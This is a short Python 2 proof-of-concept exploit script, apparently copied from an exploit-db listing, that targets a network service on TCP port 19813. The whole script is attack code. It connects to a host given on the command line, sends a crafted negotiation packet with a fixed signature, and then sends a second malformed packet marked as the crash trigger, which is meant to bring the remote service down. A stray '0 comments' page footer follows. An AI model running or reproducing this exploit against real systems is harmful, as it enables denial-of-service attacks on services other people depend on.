#!/usr/bin/python |
|
import socket,struct,sys,os |
|
SIGN=0x04030201 |
cmd=0x01000000 |
|
def main(): |
if len(sys.argv)!=2: |
print"\n[x] Usage: python "+sys.argv[0]+" < ip_server >\n" |
sys.exit(0) |
|
else: |
host=sys.argv[1],19813 #default port TCP/19813 |
|
if sys.platform=="win32": |
os.system("cls") |
else: |
os.system("clear") |
|
s=socket.socket() |
try: |
s.connect(host) |
s.recv(1024) |
except: |
print"[x] Error connecting to remote host! This is g00d :D." |
sys.exit(0) |
print"[+] Building crafted packets..." |
#packet negotiation request |
pktnego=struct.pack(">L",cmd+0x1) #+0 |
pktnego+=struct.pack("<L",0x00000000) #+4 |
pktnego+=struct.pack("<L",SIGN) #+8 (signature) |
#packet crash |
pkt1=struct.pack("<L",cmd+0x2) |
pkt1+=struct.pack(">L",0x00000001) # != 0x0 |
pkt1+=struct.pack("<L",SIGN) |
#end |
print"[+] Negotiation." |
s.send(pktnego) |
s.recv(1024) |
s.send(pkt1)#crash! |
s.close() |
|
if __name__=="__main__": |
main() |
#PoC: http://www.exploit-db.com/sploits/15214.zip |
0 条评论。